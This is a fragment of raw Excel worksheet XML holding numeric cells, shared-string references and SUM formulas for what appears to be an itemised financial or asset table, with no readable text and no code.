      <c r="C2842" s="9" t="s">
        <v>12658</v>
      </c>
      <c r="D2842" s="9"/>
      <c r="E2842" s="9" t="s">
        <v>7800</v>
      </c>
      <c r="F2842" s="9" t="s">
        <v>12662</v>
      </c>
      <c r="G2842" s="16" t="s">
        <v>5495</v>
      </c>
      <c r="H2842" s="9"/>
      <c r="I2842" s="17"/>
      <c r="J2842" s="15">
        <v>256</v>
      </c>
      <c r="K2842" s="16"/>
    </row>
    <row r="2843" spans="2:11">
      <c r="B2843" s="9">
        <v>2882</v>
      </c>
      <c r="C2843" s="9" t="s">
        <v>12658</v>
      </c>
      <c r="D2843" s="9"/>
      <c r="E2843" s="9" t="s">
        <v>6462</v>
      </c>
      <c r="F2843" s="9"/>
      <c r="G2843" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H2843" s="9"/>
      <c r="I2843" s="17"/>
      <c r="J2843" s="15">
        <v>28</v>
      </c>
      <c r="K2843" s="16"/>
    </row>
    <row r="2844" spans="2:11">
      <c r="B2844" s="9">
        <v>2883</v>
      </c>
      <c r="C2844" s="9" t="s">
        <v>12658</v>
      </c>
      <c r="D2844" s="9"/>
      <c r="E2844" s="9" t="s">
        <v>12663</v>
      </c>
      <c r="F2844" s="9" t="s">
        <v>12664</v>
      </c>
      <c r="G2844" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H2844" s="9"/>
      <c r="I2844" s="17"/>
      <c r="J2844" s="15">
        <v>160</v>
      </c>
      <c r="K2844" s="16"/>
    </row>
    <row r="2845" spans="2:11">
      <c r="B2845" s="9"/>
      <c r="C2845" s="9"/>
      <c r="D2845" s="9"/>
      <c r="E2845" s="9"/>
      <c r="F2845" s="9"/>
      <c r="G2845" s="16"/>
      <c r="H2845" s="9"/>
      <c r="I2845" s="17"/>
      <c r="J2845" s="15">
        <v>0</v>
      </c>
      <c r="K2845" s="16"/>
    </row>
    <row r="2846" spans="2:11">
      <c r="B2846" s="9"/>
      <c r="C2846" s="9"/>
      <c r="D2846" s="9"/>
      <c r="E2846" s="9"/>
      <c r="F2846" s="9"/>
      <c r="G2846" s="16"/>
      <c r="H2846" s="9"/>
      <c r="I2846" s="17"/>
      <c r="J2846" s="15">
        <v>0</v>
      </c>
      <c r="K2846" s="16"/>
    </row>
    <row r="2847" spans="2:11">
      <c r="B2847" s="18" t="s">
        <v>12665</v>
      </c>
      <c r="C2847" s="19"/>
      <c r="D2847" s="19"/>
      <c r="E2847" s="20"/>
      <c r="F2847" s="9"/>
      <c r="G2847" s="16"/>
      <c r="H2847" s="9"/>
      <c r="I2847" s="21">
        <f>SUM(I8:I2846)</f>
        <v>5901381.61999999</v>
      </c>
      <c r="J2847" s="22">
        <f>SUM(J8:J2846)</f>
        <v>957379.663468802</v>
      </c>
      <c r="K2847" s="16"/>
    </row>
  </sheetData>
  <mergeCells count="14">
    <mergeCell ref="B2:K2"/>
    <mergeCell ref="B4:C4"/>
    <mergeCell ref="D4:L4"/>
    <mergeCell ref="B2847:E2847"/>
    <mergeCell ref="B6:B7"/>
    <mergeCell ref="C6:C7"/>
    <mergeCell ref="D6:D7"/>
    <mergeCell ref="E6:E7"/>
    <mergeCell ref="F6:F7"/>
    <mergeCell ref="G6:G7"/>
    <mergeCell ref="H6:H7"/>
    <mergeCell ref="I6:I7"/>
    <mergeCell ref="J6:J7"/>
    <mergeCell ref="K6:K7"/>
  </mergeCells>
  <pageMargins left="0.699305555555556" right="0.699305555555556"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M458"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="K7" sqref="K7:K458"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="24" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="9" style="176"/>
    <col min="2" max="2" width="5.625" style="177" customWidth="1"/>
    <col min="3" max="3" width="9.5" style="177" customWidth="1"/>
    <col min="4" max="4" width="25" style="203" customWidth="1"/>
    <col min="5" max="5" width="23.375" style="203" customWidth="1"/>
    <col min="6" max="6" width="26.625" style="204" customWidth="1"/>
    <col min="7" max="7" width="5.375" style="177" customWidth="1"/>
    <col min="8" max="8" width="5.75" style="177" customWidth="1"/>
    <col min="9" max="9" width="10.75" style="177" customWidth="1"/>
    <col min="10" max="10" width="14.875" style="213" customWidth="1"/>
    <col min="11" max="11" width="14.75" style="176" customWidth="1"/>
    <col min="12" max="12" width="17.625" style="204" customWidth="1"/>
    <col min="13" max="13" width="15.75" style="176" customWidth="1"/>
    <col min="14" max="16384" width="9" style="176"/>
  </cols>
  <sheetData>
    <row r="1" customHeight="1" spans="2:11">
      <c r="B1" s="3" t="s">
        <v>206</v>
      </c>
      <c r="C1" s="3"/>
      <c r="D1" s="3"/>
      <c r="E1" s="3"/>
      <c r="F1" s="3"/>
      <c r="G1" s="3"/>
      <c r="H1" s="3"/>
      <c r="I1" s="3"/>
      <c r="J1" s="3"/>
      <c r="K1" s="3"/>
    </row>
    <row r="3" customHeight="1" spans="2:12">
      <c r="B3" s="4" t="s">
        <v>207</v>
      </c>
      <c r="C3" s="4"/>
      <c r="D3" s="5" t="s">
        <v>208</v>
      </c>
      <c r="E3" s="5"/>
      <c r="F3" s="5"/>
      <c r="G3" s="5"/>
      <c r="H3" s="5"/>
      <c r="I3" s="5"/>
      <c r="J3" s="5"/>
      <c r="K3" s="5"/>
      <c r="L3" s="5"/>
    </row>
    <row r="4" ht="14.25" customHeight="1"/>
    <row r="5" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:12">
      <c r="B5" s="184" t="s">
        <v>209</v>
      </c>
      <c r="C5" s="184" t="s">
        <v>210</v>
      </c>
      <c r="D5" s="214" t="s">
        <v>211</v>
      </c>
      <c r="E5" s="214" t="s">
        <v>212</v>
      </c>
      <c r="F5" s="214" t="s">
        <v>213</v>
      </c>
      <c r="G5" s="184" t="s">
        <v>214</v>
      </c>
      <c r="H5" s="184" t="s">
        <v>215</v>
      </c>
      <c r="I5" s="184" t="s">
        <v>216</v>
      </c>
      <c r="J5" s="221" t="s">
        <v>217</v>
      </c>
      <c r="K5" s="31" t="s">
        <v>218</v>
      </c>
      <c r="L5" s="214" t="s">
        <v>219</v>
      </c>
    </row>
    <row r="6" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:12">
      <c r="B6" s="186"/>
      <c r="C6" s="186"/>
      <c r="D6" s="215"/>
      <c r="E6" s="215"/>
      <c r="F6" s="215"/>
      <c r="G6" s="186"/>
      <c r="H6" s="186"/>
      <c r="I6" s="186"/>
      <c r="J6" s="222"/>
      <c r="K6" s="31"/>
      <c r="L6" s="215"/>
    </row>
    <row r="7" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:12">
      <c r="B7" s="216" t="s">
        <v>220</v>
      </c>
      <c r="C7" s="217"/>
      <c r="D7" s="218"/>
      <c r="E7" s="219"/>
      <c r="F7" s="219"/>
      <c r="G7" s="220"/>
      <c r="H7" s="220"/>
      <c r="I7" s="220"/>
      <c r="J7" s="223"/>
      <c r="K7" s="224"/>
      <c r="L7" s="220"/>
    </row>
    <row r="8" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B8" s="88">
        <v>1</v>
      </c>
      <c r="C8" s="237" t="s">
        <v>221</v>
      </c>
      <c r="D8" s="238" t="s">
        <v>222</v>
      </c>
      <c r="E8" s="11"/>
      <c r="F8" s="88"/>
      <c r="G8" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H8" s="11">
        <v>3</v>
      </c>
      <c r="I8" s="237" t="s">
        <v>224</v>
      </c>
      <c r="J8" s="100">
        <v>16326</v>
      </c>
      <c r="K8" s="99">
        <v>653.04</v>
      </c>
      <c r="L8" s="239" t="s">
        <v>225</v>
      </c>
      <c r="M8" s="225"/>
    </row>
    <row r="9" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B9" s="88">
        <v>2</v>
      </c>
      <c r="C9" s="237" t="s">
        <v>226</v>
      </c>
      <c r="D9" s="238" t="s">
        <v>227</v>
      </c>
      <c r="E9" s="237" t="s">
        <v>228</v>
      </c>
      <c r="F9" s="88"/>
      <c r="G9" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H9" s="11">
        <v>1</v>
      </c>
      <c r="I9" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J9" s="100">
        <v>55400</v>
      </c>
      <c r="K9" s="99">
        <v>5400</v>
      </c>
      <c r="L9" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M9" s="225"/>
    </row>
    <row r="10" s="175" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B10" s="88">
        <v>3</v>
      </c>
      <c r="C10" s="237" t="s">
        <v>231</v>
      </c>
      <c r="D10" s="238" t="s">
        <v>232</v>
      </c>
      <c r="E10" s="238" t="s">
        <v>233</v>
      </c>
      <c r="F10" s="14"/>
      <c r="G10" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H10" s="11">
        <v>2</v>
      </c>
      <c r="I10" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J10" s="91">
        <v>156400</v>
      </c>
      <c r="K10" s="99">
        <v>14400</v>
      </c>
      <c r="L10" s="238" t="s">
        <v>230</v>
      </c>
      <c r="M10" s="225"/>
    </row>
    <row r="11" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B11" s="88">
        <v>4</v>
      </c>
      <c r="C11" s="237" t="s">
        <v>234</v>
      </c>
      <c r="D11" s="238" t="s">
        <v>235</v>
      </c>
      <c r="E11" s="237" t="s">
        <v>236</v>
      </c>
      <c r="F11" s="88"/>
      <c r="G11" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H11" s="11">
        <v>1</v>
      </c>
      <c r="I11" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J11" s="100">
        <v>51000</v>
      </c>
      <c r="K11" s="99">
        <v>2040</v>
      </c>
      <c r="L11" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M11" s="225"/>
    </row>
    <row r="12" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B12" s="88">
        <v>5</v>
      </c>
      <c r="C12" s="237" t="s">
        <v>237</v>
      </c>
      <c r="D12" s="238" t="s">
        <v>238</v>
      </c>
      <c r="E12" s="237" t="s">
        <v>239</v>
      </c>
      <c r="F12" s="88"/>
      <c r="G12" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H12" s="11">
        <v>1</v>
      </c>
      <c r="I12" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J12" s="100">
        <v>8000</v>
      </c>
      <c r="K12" s="99">
        <v>320</v>
      </c>
      <c r="L12" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M12" s="225"/>
    </row>
    <row r="13" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B13" s="88">
        <v>6</v>
      </c>
      <c r="C13" s="237" t="s">
        <v>240</v>
      </c>
      <c r="D13" s="238" t="s">
        <v>241</v>
      </c>
      <c r="E13" s="237" t="s">
        <v>242</v>
      </c>
      <c r="F13" s="88"/>
      <c r="G13" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H13" s="11">
        <v>1</v>
      </c>
      <c r="I13" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J13" s="100">
        <v>110000</v>
      </c>
      <c r="K13" s="99">
        <v>11400</v>
      </c>
      <c r="L13" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M13" s="225"/>
    </row>
    <row r="14" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B14" s="88">
        <v>7</v>
      </c>
      <c r="C14" s="237" t="s">
        <v>243</v>
      </c>
      <c r="D14" s="238" t="s">
        <v>244</v>
      </c>
      <c r="E14" s="237" t="s">
        <v>245</v>
      </c>
      <c r="F14" s="88"/>
      <c r="G14" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H14" s="11">
        <v>1</v>
      </c>
      <c r="I14" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J14" s="100">
        <v>111200</v>
      </c>
      <c r="K14" s="99">
        <v>3840</v>
      </c>
      <c r="L14" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M14" s="225"/>
    </row>
    <row r="15" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B15" s="88">
        <v>8</v>
      </c>
      <c r="C15" s="237" t="s">
        <v>246</v>
      </c>
      <c r="D15" s="238" t="s">
        <v>247</v>
      </c>
      <c r="E15" s="237" t="s">
        <v>248</v>
      </c>
      <c r="F15" s="88"/>
      <c r="G15" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H15" s="11">
        <v>1</v>
      </c>
      <c r="I15" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J15" s="100">
        <v>381300</v>
      </c>
      <c r="K15" s="99">
        <v>38400</v>
      </c>
      <c r="L15" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M15" s="225"/>
    </row>
    <row r="16" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B16" s="88">
        <v>9</v>
      </c>
      <c r="C16" s="237" t="s">
        <v>249</v>
      </c>
      <c r="D16" s="238" t="s">
        <v>250</v>
      </c>
      <c r="E16" s="237" t="s">
        <v>251</v>
      </c>
      <c r="F16" s="88"/>
      <c r="G16" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H16" s="11">
        <v>1</v>
      </c>
      <c r="I16" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J16" s="100">
        <v>27200</v>
      </c>
      <c r="K16" s="99">
        <v>2160</v>
      </c>
      <c r="L16" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M16" s="225"/>
    </row>
    <row r="17" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B17" s="88">
        <v>10</v>
      </c>
      <c r="C17" s="237" t="s">
        <v>252</v>
      </c>
      <c r="D17" s="238" t="s">
        <v>253</v>
      </c>
      <c r="E17" s="237" t="s">
        <v>254</v>
      </c>
      <c r="F17" s="88"/>
      <c r="G17" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H17" s="11">
        <v>1</v>
      </c>
      <c r="I17" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J17" s="100">
        <v>174000</v>
      </c>
      <c r="K17" s="99">
        <v>20880</v>
      </c>
      <c r="L17" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M17" s="225"/>
    </row>
    <row r="18" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B18" s="88">
        <v>11</v>
      </c>
      <c r="C18" s="237" t="s">
        <v>255</v>
      </c>
      <c r="D18" s="238" t="s">
        <v>256</v>
      </c>
      <c r="E18" s="237" t="s">
        <v>257</v>
      </c>
      <c r="F18" s="88"/>
      <c r="G18" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H18" s="11">
        <v>1</v>
      </c>
      <c r="I18" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J18" s="100">
        <v>29000</v>
      </c>
      <c r="K18" s="99">
        <v>10200</v>
      </c>
      <c r="L18" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M18" s="225"/>
    </row>
    <row r="19" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B19" s="88">
        <v>12</v>
      </c>
      <c r="C19" s="237" t="s">
        <v>258</v>
      </c>
      <c r="D19" s="238" t="s">
        <v>259</v>
      </c>
      <c r="E19" s="237" t="s">
        <v>260</v>
      </c>
      <c r="F19" s="88"/>
      <c r="G19" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H19" s="11">
        <v>1</v>
      </c>
      <c r="I19" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J19" s="100">
        <v>3135594.52</v>
      </c>
      <c r="K19" s="99">
        <v>375600</v>
      </c>
      <c r="L19" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M19" s="225"/>
    </row>
    <row r="20" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B20" s="88">
        <v>13</v>
      </c>
      <c r="C20" s="237" t="s">
        <v>261</v>
      </c>
      <c r="D20" s="238" t="s">
        <v>256</v>
      </c>
      <c r="E20" s="11"/>
      <c r="F20" s="88"/>
      <c r="G20" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H20" s="11">
        <v>1</v>
      </c>
      <c r="I20" s="237" t="s">
        <v>262</v>
      </c>
      <c r="J20" s="100">
        <v>28800</v>
      </c>
      <c r="K20" s="99">
        <v>4116</v>
      </c>
      <c r="L20" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M20" s="225"/>
    </row>
    <row r="21" ht="14.25" customHeight="1" spans="2:13">
      <c r="B21" s="88">
        <v>14</v>
      </c>
      <c r="C21" s="237" t="s">
        <v>263</v>
      </c>
      <c r="D21" s="238" t="s">
        <v>264</v>
      </c>
      <c r="E21" s="238" t="s">
        <v>265</v>
      </c>
      <c r="F21" s="14"/>
      <c r="G21" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H21" s="11">
        <v>2</v>
      </c>
      <c r="I21" s="237" t="s">
        <v>266</v>
      </c>
      <c r="J21" s="91">
        <v>250000</v>
      </c>
      <c r="K21" s="99">
        <v>0</v>
      </c>
      <c r="L21" s="238" t="s">
        <v>230</v>
      </c>
      <c r="M21" s="225"/>
    </row>
    <row r="22" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B22" s="88">
        <v>15</v>
      </c>
      <c r="C22" s="237" t="s">
        <v>267</v>
      </c>
      <c r="D22" s="238" t="s">
        <v>268</v>
      </c>
      <c r="E22" s="237" t="s">
        <v>269</v>
      </c>
      <c r="F22" s="88"/>
      <c r="G22" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H22" s="11">
        <v>2</v>
      </c>
      <c r="I22" s="237" t="s">
        <v>266</v>
      </c>
      <c r="J22" s="100">
        <v>40000</v>
      </c>
      <c r="K22" s="99">
        <v>6624</v>
      </c>
      <c r="L22" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M22" s="225"/>
    </row>
    <row r="23" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B23" s="88">
        <v>16</v>
      </c>
      <c r="C23" s="237" t="s">
        <v>270</v>
      </c>
      <c r="D23" s="238" t="s">
        <v>271</v>
      </c>
      <c r="E23" s="237" t="s">
        <v>272</v>
      </c>
      <c r="F23" s="88"/>
      <c r="G23" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H23" s="11">
        <v>1</v>
      </c>
      <c r="I23" s="237" t="s">
        <v>273</v>
      </c>
      <c r="J23" s="100">
        <v>2041493.74</v>
      </c>
      <c r="K23" s="99">
        <v>375360</v>
      </c>
      <c r="L23" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M23" s="225"/>
    </row>
    <row r="24" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B24" s="88">
        <v>17</v>
      </c>
      <c r="C24" s="237" t="s">
        <v>274</v>
      </c>
      <c r="D24" s="238" t="s">
        <v>275</v>
      </c>
      <c r="E24" s="237" t="s">
        <v>276</v>
      </c>
      <c r="F24" s="88"/>
      <c r="G24" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H24" s="11">
        <v>1</v>
      </c>
      <c r="I24" s="237" t="s">
        <v>273</v>
      </c>
      <c r="J24" s="100">
        <v>1735000</v>
      </c>
      <c r="K24" s="99">
        <v>318320</v>
      </c>
      <c r="L24" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M24" s="225"/>
    </row>
    <row r="25" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B25" s="88">
        <v>18</v>
      </c>
      <c r="C25" s="237" t="s">
        <v>277</v>
      </c>
      <c r="D25" s="238" t="s">
        <v>278</v>
      </c>
      <c r="E25" s="237" t="s">
        <v>279</v>
      </c>
      <c r="F25" s="88"/>
      <c r="G25" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H25" s="11">
        <v>1</v>
      </c>
      <c r="I25" s="237" t="s">
        <v>273</v>
      </c>
      <c r="J25" s="100">
        <v>290000</v>
      </c>
      <c r="K25" s="99">
        <v>53360</v>
      </c>
      <c r="L25" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M25" s="225"/>
    </row>
    <row r="26" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B26" s="88">
        <v>19</v>
      </c>
      <c r="C26" s="237" t="s">
        <v>280</v>
      </c>
      <c r="D26" s="238" t="s">
        <v>281</v>
      </c>
      <c r="E26" s="237" t="s">
        <v>282</v>
      </c>
      <c r="F26" s="88"/>
      <c r="G26" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H26" s="11">
        <v>1</v>
      </c>
      <c r="I26" s="237" t="s">
        <v>273</v>
      </c>
      <c r="J26" s="100">
        <v>45000</v>
      </c>
      <c r="K26" s="99">
        <v>8280</v>
      </c>
      <c r="L26" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M26" s="225"/>
    </row>
    <row r="27" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B27" s="88">
        <v>20</v>
      </c>
      <c r="C27" s="237" t="s">
        <v>283</v>
      </c>
      <c r="D27" s="238" t="s">
        <v>284</v>
      </c>
      <c r="E27" s="237" t="s">
        <v>285</v>
      </c>
      <c r="F27" s="88"/>
      <c r="G27" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H27" s="11">
        <v>1</v>
      </c>
      <c r="I27" s="237" t="s">
        <v>273</v>
      </c>
      <c r="J27" s="100">
        <v>120000</v>
      </c>
      <c r="K27" s="99">
        <v>22080</v>
      </c>
      <c r="L27" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M27" s="225"/>
    </row>
    <row r="28" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B28" s="88">
        <v>21</v>
      </c>
      <c r="C28" s="237" t="s">
        <v>286</v>
      </c>
      <c r="D28" s="238" t="s">
        <v>287</v>
      </c>
      <c r="E28" s="237" t="s">
        <v>288</v>
      </c>
      <c r="F28" s="88"/>
      <c r="G28" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H28" s="11">
        <v>1</v>
      </c>
      <c r="I28" s="237" t="s">
        <v>273</v>
      </c>
      <c r="J28" s="100">
        <v>230000</v>
      </c>
      <c r="K28" s="99">
        <v>27600</v>
      </c>
      <c r="L28" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M28" s="225"/>
    </row>
    <row r="29" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B29" s="88">
        <v>22</v>
      </c>
      <c r="C29" s="237" t="s">
        <v>289</v>
      </c>
      <c r="D29" s="238" t="s">
        <v>290</v>
      </c>
      <c r="E29" s="237" t="s">
        <v>291</v>
      </c>
      <c r="F29" s="88"/>
      <c r="G29" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H29" s="11">
        <v>1</v>
      </c>
      <c r="I29" s="237" t="s">
        <v>273</v>
      </c>
      <c r="J29" s="100">
        <v>120000</v>
      </c>
      <c r="K29" s="99">
        <v>4600</v>
      </c>
      <c r="L29" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M29" s="225"/>
    </row>
    <row r="30" ht="14.25" customHeight="1" spans="2:13">
      <c r="B30" s="88">
        <v>23</v>
      </c>
      <c r="C30" s="237" t="s">
        <v>292</v>
      </c>
      <c r="D30" s="238" t="s">
        <v>293</v>
      </c>
      <c r="E30" s="238" t="s">
        <v>294</v>
      </c>
      <c r="F30" s="14"/>
      <c r="G30" s="11"/>
      <c r="H30" s="11">
        <v>2</v>
      </c>
      <c r="I30" s="237" t="s">
        <v>273</v>
      </c>
      <c r="J30" s="91">
        <v>140000</v>
      </c>
      <c r="K30" s="99">
        <v>51520</v>
      </c>
      <c r="L30" s="238" t="s">
        <v>230</v>
      </c>
      <c r="M30" s="225"/>
    </row>
    <row r="31" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B31" s="88">
        <v>24</v>
      </c>
      <c r="C31" s="237" t="s">
        <v>295</v>
      </c>
      <c r="D31" s="238" t="s">
        <v>296</v>
      </c>
      <c r="E31" s="11"/>
      <c r="F31" s="88"/>
      <c r="G31" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H31" s="11">
        <v>1</v>
      </c>
      <c r="I31" s="237" t="s">
        <v>273</v>
      </c>
      <c r="J31" s="100">
        <v>80000</v>
      </c>
      <c r="K31" s="99">
        <v>14720</v>
      </c>
      <c r="L31" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M31" s="225"/>
    </row>
    <row r="32" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B32" s="88">
        <v>25</v>
      </c>
      <c r="C32" s="237" t="s">
        <v>297</v>
      </c>
      <c r="D32" s="238" t="s">
        <v>298</v>
      </c>
      <c r="E32" s="237" t="s">
        <v>282</v>
      </c>
      <c r="F32" s="88"/>
      <c r="G32" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H32" s="11">
        <v>1</v>
      </c>
      <c r="I32" s="237" t="s">
        <v>273</v>
      </c>
      <c r="J32" s="100">
        <v>640000</v>
      </c>
      <c r="K32" s="99">
        <v>117760</v>
      </c>
      <c r="L32" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M32" s="225"/>
    </row>
    <row r="33" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B33" s="88">
        <v>26</v>
      </c>
      <c r="C33" s="237" t="s">
        <v>299</v>
      </c>
      <c r="D33" s="238" t="s">
        <v>300</v>
      </c>
      <c r="E33" s="237" t="s">
        <v>301</v>
      </c>
      <c r="F33" s="88"/>
      <c r="G33" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H33" s="11">
        <v>1</v>
      </c>
      <c r="I33" s="237" t="s">
        <v>273</v>
      </c>
      <c r="J33" s="100">
        <v>250000</v>
      </c>
      <c r="K33" s="99">
        <v>46000</v>
      </c>
      <c r="L33" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M33" s="225"/>
    </row>
    <row r="34" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B34" s="88">
        <v>27</v>
      </c>
      <c r="C34" s="237" t="s">
        <v>302</v>
      </c>
      <c r="D34" s="238" t="s">
        <v>303</v>
      </c>
      <c r="E34" s="11"/>
      <c r="F34" s="88"/>
      <c r="G34" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H34" s="11">
        <v>1</v>
      </c>
      <c r="I34" s="237" t="s">
        <v>273</v>
      </c>
      <c r="J34" s="100">
        <v>460000</v>
      </c>
      <c r="K34" s="99">
        <v>82800</v>
      </c>
      <c r="L34" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M34" s="225"/>
    </row>
    <row r="35" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B35" s="88">
        <v>28</v>
      </c>
      <c r="C35" s="237" t="s">
        <v>304</v>
      </c>
      <c r="D35" s="238" t="s">
        <v>305</v>
      </c>
      <c r="E35" s="237" t="s">
        <v>306</v>
      </c>
      <c r="F35" s="88"/>
      <c r="G35" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H35" s="11">
        <v>1</v>
      </c>
      <c r="I35" s="237" t="s">
        <v>273</v>
      </c>
      <c r="J35" s="100">
        <v>560000</v>
      </c>
      <c r="K35" s="99">
        <v>88320</v>
      </c>
      <c r="L35" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M35" s="225"/>
    </row>
    <row r="36" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B36" s="88">
        <v>29</v>
      </c>
      <c r="C36" s="237" t="s">
        <v>307</v>
      </c>
      <c r="D36" s="238" t="s">
        <v>308</v>
      </c>
      <c r="E36" s="237" t="s">
        <v>309</v>
      </c>
      <c r="F36" s="88"/>
      <c r="G36" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H36" s="11">
        <v>2</v>
      </c>
      <c r="I36" s="237" t="s">
        <v>310</v>
      </c>
      <c r="J36" s="100">
        <v>89800</v>
      </c>
      <c r="K36" s="99">
        <v>10500</v>
      </c>
      <c r="L36" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M36" s="225"/>
    </row>
    <row r="37" ht="14.25" customHeight="1" spans="2:13">
      <c r="B37" s="88">
        <v>30</v>
      </c>
      <c r="C37" s="237" t="s">
        <v>311</v>
      </c>
      <c r="D37" s="238" t="s">
        <v>312</v>
      </c>
      <c r="E37" s="238" t="s">
        <v>313</v>
      </c>
      <c r="F37" s="14"/>
      <c r="G37" s="11"/>
      <c r="H37" s="11">
        <v>3</v>
      </c>
      <c r="I37" s="237" t="s">
        <v>310</v>
      </c>
      <c r="J37" s="91">
        <v>36000</v>
      </c>
      <c r="K37" s="99">
        <v>16560</v>
      </c>
      <c r="L37" s="238" t="s">
        <v>230</v>
      </c>
      <c r="M37" s="225"/>
    </row>
    <row r="38" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B38" s="88">
        <v>31</v>
      </c>
      <c r="C38" s="237" t="s">
        <v>314</v>
      </c>
      <c r="D38" s="238" t="s">
        <v>315</v>
      </c>
      <c r="E38" s="237" t="s">
        <v>316</v>
      </c>
      <c r="F38" s="88"/>
      <c r="G38" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H38" s="11">
        <v>1</v>
      </c>
      <c r="I38" s="237" t="s">
        <v>310</v>
      </c>
      <c r="J38" s="100">
        <v>18000</v>
      </c>
      <c r="K38" s="99">
        <v>2208</v>
      </c>
      <c r="L38" s="239" t="s">
        <v>230</v>
      </c>
      <c r="M38" s="225"/>
    </row>
    <row r="39" s="210" customFormat="1" ht="14.25" customHeight="1" spans="2:13">
      <c r="B39" s="88">
        <v>32</v>
      </c>
